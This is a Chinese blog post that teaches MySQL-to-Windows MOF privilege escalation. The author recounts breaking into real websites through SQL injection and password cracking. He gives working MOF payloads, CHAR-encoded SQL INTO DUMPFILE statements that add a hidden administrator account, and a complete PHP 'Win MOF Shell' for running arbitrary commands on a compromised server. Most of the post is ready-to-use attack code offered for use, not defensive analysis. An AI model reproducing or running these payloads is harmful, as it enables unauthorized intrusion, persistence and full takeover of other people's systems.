zoukankan      html  css  js  c++  java
  • Mof提权科普

    今天再拿一个站的时候遇到了很多问题,拿站的过程就不说了,其中要用到mof提权,不管能不能提下,我进行一个mof提权的科普

    这里我综合各类mof提权进行了 综合

    首先说一下,无shell情况下的mysql远程mof提权利用方法详解

    就是你注入拿到了数据库的root账号密码,直接进行

    扫到一个站的注入


    在havij中得到mysql数据库中mysql库保存的数据库密码: 


    有时候发现1.15版的还是最好用,最稳定,虽然速度慢了一点。 
    照样放到坛子里让机油破了 


    感谢Mr.Lu。顺便吐槽下,cmd5连个root都要收费。。。 
    在等着密码破解出来的时候顺便nmap了一下 


    意外发现端口改到了1126,给后面省下了不少时间。 
    照常外连试试 


    上个帖子里面有基友问这个软件是什么,我用的是navicat,感觉很好用的 
    现在的常规思路就是得到绝对路径,写一个小马,再进一步渗透。 
    但是网站上面暴不出路径,看看mysql的路径 
    用select @@basedir;命令可以看到; 


    网站的路径大概差不多了,懒得一个一个试了,最近mof提权挺火的,上次失败了一次,这次再来试试好了。 
    Mof的科普文很多, 

    mof文件内容为:

    #pragma namespace("\\.\root\subscription")instance of __EventFilter as $EventFilter{    EventNamespace = "Root\Cimv2";    Name  = "filtP2";    Query = "Select * From __InstanceModificationEvent "            "Where TargetInstance Isa "Win32_LocalTime" "            "And TargetInstance.Second = 5";    QueryLanguage = "WQL";};instance of ActiveScriptEventConsumer as $Consumer{    Name = "consPCSV2";    ScriptingEngine = "JScript";    ScriptText =    "var WSH = new ActiveXObject("WScript.Shell") WSH.run("net.exe user admin admin /add")"; };instance of __FilterToConsumerBinding{    Consumer   = $Consumer;    Filter = $EventFilter;};

     

    由于没有马,不能按照网盘里面说的先传一个mof上去,我就直接一次性写入。
    先是试了试直接将原来的语句写入,提示失败,原因就是语句里面很多";回车"之类的符号。
    然后就想转化为16进制或者asc码这样。
    先试了16进制。
    等了老半天什么还是登陆不上去,就放弃了,改用asc码,用的sql语句为:

     

    SELECT CHAR(35,112,114,97,103,109,97,32,110,97,109,101,115,112,97,99,101,40,34,92,92,92,92,46,92,92,114,111,111,116,92,92,115,117,98,115,99,114,105,112,116,105,111,110,34,41,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,69,118,101,110,116,70,105,108,116,101,114,32,97,115,32,36,69,118,101,110,116,70,105,108,116,101,114,13,10,123,13,10,32,32,32,32,69,118,101,110,116,78,97,109,101,115,112,97,99,101,32,61,32,34,82,111,111,116,92,92,67,105,109,118,50,34,59,13,10,32,32,32,32,78,97,109,101,32,32,61,32,34,102,105,108,116,80,50,34,59,13,10,32,32,32,32,81,117,101,114,121,32,61,32,34,83,101,108,101,99,116,32,42,32,70,114,111,109,32,95,95,73,110,115,116,97,110,99,101,77,111,100,105,102,105,99,97,116,105,111,110,69,118,101,110,116,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,87,104,101,114,101,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,32,73,115,97,32,92,34,87,105,110,51,50,95,76,111,99,97,108,84,105,109,101,92,34,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,65,110,100,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,46,83,101,99,111,110,100,32,61,32,53,34,59,13,10,32,32,32,32,81,117,101,114,121,76,97,110,103,117,97,103,101,32,61,32,34,87,81,76,34,59,13,10,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,65,99,116,105,118,101,83,99,114,105,112,116,69,118,101,110,116,67,111,110,115,117,109,101,114,32,97,115,32,36,67,111,110,115,117,109,101,114,13,10,123,13,10,32,32,32,32,78,97,109,101,32,61,32,34,99,111,110,115,80,67,83,86,50,34,59,13,10,32,32,32,32,83,99,114,105,112,116,105,110,103,69,110,103,105,110,101,32,61,32,34,74,83,99,114,105,112,116,34,59,13,10,32,32,32,32,83,99,114,105,112,116,84,101,120,116,32,61,13,10,32,32,32,32,34,118,97,114,32,87,83,72,32,61,32,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,92,34,87,83,99,114,105,112,116,46,83,104,101,108,108,92,34,41,92,110,87,83,72,46,114,117,110,40,92,34,110,101,116,46,101,120,101,32,117,115,101,114,32,97,100,109,105,110,32,97,100,109,105,110,32,47,97,100,100,92,34,41,34,59,13,10,32,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,70,105,108,116,101,114,84,111,67,111,110,115,117,109,101,114,66,105,110,100,105,110,103,13,10,123,13,10,32,32,32,32,67,111,110,115,117,109,101,114,32,32,32,61,32,36,67,111,110,115,117,109,101,114,59,13,10,32,32,32,32,70,105,108,116,101,114,32,61,32,36,69,118,101,110,116,70,105,108,116,101,114,59,13,10,125,59) INTO dumpfile  'c:/windows/system32/wbem/mof/nullevt.mof';


    这时候才意识到一个问题,上面的语句只添加了用户,忘了提升为管理员了。。。 
    好吧,重新写一遍mof

     

    select char(35,112,114,97,103,109,97,32,110,97,109,101,115,112,97,99,101,40,34,92,92,92,92,46,92,92,114,111,111,116,92,92,115,117,98,115,99,114,105,112,116,105,111,110,34,41,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,69,118,101,110,116,70,105,108,116,101,114,32,97,115,32,36,69,118,101,110,116,70,105,108,116,101,114,13,10,123,13,10,32,32,32,32,69,118,101,110,116,78,97,109,101,115,112,97,99,101,32,61,32,34,82,111,111,116,92,92,67,105,109,118,50,34,59,13,10,32,32,32,32,78,97,109,101,32,32,61,32,34,102,105,108,116,80,50,34,59,13,10,32,32,32,32,81,117,101,114,121,32,61,32,34,83,101,108,101,99,116,32,42,32,70,114,111,109,32,95,95,73,110,115,116,97,110,99,101,77,111,100,105,102,105,99,97,116,105,111,110,69,118,101,110,116,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,87,104,101,114,101,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,32,73,115,97,32,92,34,87,105,110,51,50,95,76,111,99,97,108,84,105,109,101,92,34,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,65,110,100,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,46,83,101,99,111,110,100,32,61,32,53,34,59,13,10,32,32,32,32,81,117,101,114,121,76,97,110,103,117,97,103,101,32,61,32,34,87,81,76,34,59,13,10,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,65,99,116,105,118,101,83,99,114,105,112,116,69,118,101,110,116,67,111,110,115,117,109,101,114,32,97,115,32,36,67,111,110,115,117,109,101,114,13,10,123,13,10,32,32,32,32,78,97,109,101,32,61,32,34,99,111,110,115,80,67,83,86,50,34,59,13,10,32,32,32,32,83,99,114,105,112,116,105,110,103,69,110,103,105,110,101,32,61,32,34,74,83,99,114,105,112,116,34,59,13,10,32,32,32,32,83,99,114,105,112,116,84,101,120,116,32,61,13,10,32,32,32,32,34,118,97,114,32,87,83,72,32,61,32,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,92,34,87,83,99,114,105,112,116,46,83,104,101,108,108,92,34,41,92,110,87,83,72,46,114,117,110,40,92,34,110,101,116,46,101,120,101,32,108,111,99,97,108,103,114,111,117,112,32,97,100,109,105,110,105,115,116,114,97,116,111,114,115,32,97,100,109,105,110,32,47,97,100,100,92,34,41,34,59,13,10,32,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,70,105,108,116,101,114,84,111,67,111,110,115,117,109,101,114,66,105,110,100,105,110,103,13,10,123,13,10,32,32,32,32,67,111,110,115,117,109,101,114,32,32,32,61,32,36,67,111,110,115,117,109,101,114,59,13,10,32,32,32,32,70,105,108,116,101,114,32,61,32,36,69,118,101,110,116,70,105,108,116,101,114,59,13,10,125,59) into dumpfile  'c:/windows/system32/wbem/mof/nullevt.mof';

     

    好了,这样就顺利登进去了;

    改天研究一下一次性完成添加管理员试试

    现在默认它还是会过5s添加一次用户,解决方法就是:
    第一 net stop winmgmt 停止服务,
    第二 删除文件夹:C:WINDOWSsystem32wbemRepository
    第三 net start winmgmt 启动服务
    还有其他方法在网盘的文件里面有写。

    一路看起来挺顺利的,是因为上次研究过这个。这次写的详细点了。

     

     

    第二种

     

    首先呢先谢谢米爷在我弄这个的时候把我骂开窍了- -。

    不多说了~。~像名称一样哈~

    首先呢是朋友扔我一shell

    他提权差就给咱了,简单的看了下,是php脚本的,一看php脚本就肯定带有,mysql。

    就在网站目录看了下data文件夹习惯性的~

    运气不错。Root。

    居然知道是这东西,上大马。(不知道利用菜刀)

    OK回显成功。

    5.0.67不用说都知道是什么了,这版本基本上udf都可以秒的,但毕竟这里说的是mof所以就用mof提吧。

    先找个可写路径。

    C盘可以,运气不错。

    然后在上传路径传个我们的mof文件

    代码如下:

    #pragmanamespace("\\.\root\subscription")

       

    instance of __EventFilter as $EventFilter

    {

       EventNamespace = "Root\Cimv2";

       Name  = "filtP2";

       Query = "Select * From __InstanceModificationEvent "

               "Where TargetInstance Isa "Win32_LocalTime" "

               "And TargetInstance.Second = 5";

       QueryLanguage = "WQL";

    };

       

    instance of ActiveScriptEventConsumer as$Consumer

    {

       Name = "consPCSV2";

       ScriptingEngine = "JScript";

       ScriptText =

       "var WSH = new ActiveXObject("WScript.Shell") WSH.run("net.exenet user user$ sword /add & net localgroup administrators user$ /add")";

    };

       

    instance of __FilterToConsumerBinding

    {

       Consumer   = $Consumer;

       Filter = $EventFilter;

    };

    生成的账号:user$ 密码为:sword

    这段代码可自行修改。

    接着呢执行命令:selectload_file('C:\RECYCLER\xx.mof') into dumpfile 'c:/windows/system32/wbem/mof/xx.mof';

    OK.。执行命令完成。

    由于权限设置无法直接查询管理员。登陆下就知道了。

    好了mof提权就这样。

    谢谢观看。

    Ps:由于当时提的时候截的几张图,后来管理员把mof的漏洞修复了。所以服务器没了。就这样~

    综合一下 

    还可直接使用mof马进行提权

    但是我经常被杀

    下面贴出代码,直接保存mof.php,即可

    运行的时候点read,多运行几次 ,因为read没有回显是没运行成功,如果出现错误他会,有回显的

    <?php$path="c:/windows/system32/canimei";session_start();if(!empty($_POST['submit'])){setcookie("connect");setcookie("connect[host]",$_POST['host']);setcookie("connect[user]",$_POST['user']);setcookie("connect[pass]",$_POST['pass']);setcookie("connect[dbname]",$_POST['dbname']);echo "<script>location.href='?action=connect'</script>";}if(empty($_GET["action"])){?><html><head><title>Win MOF Shell</title></head><body><formaction="?action=connect"method="post">Host:<inputtype="text"name="host"value="192.168.200.144:3306"><br/>User:<inputtype="text"name="user"value="root"><br/>Pass:<inputtype="password"name="pass"value="toor"><br/>DB:<inputtype="text"name="dbname"value="mysql"><br/><inputtype="submit"name="submit"value="Submit"><br/></form></body></html><?phpexit;}if($_GET[action]=='connect'){$conn=mysql_connect($_COOKIE["connect"]["host"],$_COOKIE["connect"]["user"],$_COOKIE["connect"]["pass"])ordie('<pre>'.mysql_error().'</pre>'); echo "<form action='' method='post'>";echo "Cmd:";echo "<input type='text' name='cmd' value='$strCmd'?>";echo "<br>";echo "<br>";echo "<inputtype='submit'value='Exploit'>";echo "</form>";echo "<formaction=''method='post'>";echo "<inputtype='hidden'name='flag'value='flag'>";echo "<inputtype='submit'value=' Read  '>";echo "</form>";if (isset($_POST['cmd'])){$strCmd=$_POST['cmd'];$cmdshell='cmd /c '.$strCmd.'>'.$path;$mofname="c:/windows/system32/wbem/mof/system.mof";$payload = "#pragma namespace("\\\\\\\\.\\\\root\\\\subscription")instance of __EventFilter as $EventFilter{  EventNamespace = "Root\\\\Cimv2";  Name  = "filtP2";  Query = "Select * From __InstanceModificationEvent "      "Where TargetInstance Isa \\"Win32_LocalTime\\" "      "And TargetInstance.Second = 5";  QueryLanguage = "WQL";};instance of ActiveScriptEventConsumer as $Consumer{  Name = "consPCSV2";  ScriptingEngine = "JScript";  ScriptText =  "var WSH = new ActiveXObject(\\"WScript.Shell\\")\\nWSH.run(\\"$cmdshell\\")"; };instance of __FilterToConsumerBinding{  Consumer = $Consumer;  Filter = $EventFilter;};";mysql_select_db($_COOKIE["connect"]["dbname"],$conn);$sql1="select '$payload' into dumpfile '$mofname';";if(mysql_query($sql1))  echo "<hr>Execute Successful!<br> Please click the read button to check the  result!!<br>If the result is not correct,try read again later<br><hr>"; else die(mysql_error()); mysql_close($conn);}if(isset($_POST['flag'])){  $conn=mysql_connect($_COOKIE["connect"]["host"],$_COOKIE["connect"]["user"],$_COOKIE["connect"]["pass"])  or die('<pre>'.mysql_error().'</pre>');   $sql2="select load_file("".$path."");";  $result2=mysql_query($sql2);  $num=mysql_num_rows($result2);  while ($row = mysql_fetch_array($result2, MYSQL_NUM)) {    echo "<hr/>";    echo '<pre>'. $row[0].'</pre>';  }  mysql_close($conn);}}?>

  • 相关阅读:
    阿里规范不建议多表Join,可这SQL要怎么写?
    SQL Server中的LEFT、RIGHT函数
    正则表达式的基本语法
    常用正则表达式
    开发中常用的正则表达式
    解读C#中的正则表达式
    wx.navigateTo、wx.redirectTo、wx.reLaunch、wx.switchTab和wx.navigateBack的区别
    强烈推荐一款图片无损压缩工具
    SQL提高查询效率的几点建议
    使用低版本的VS打开高版本项目的解决方案(以VS2008打开VS2010开发的项目为例)
  • 原文地址:https://www.cnblogs.com/h4ck0ne/p/5154602.html
Copyright © 2011-2022 走看看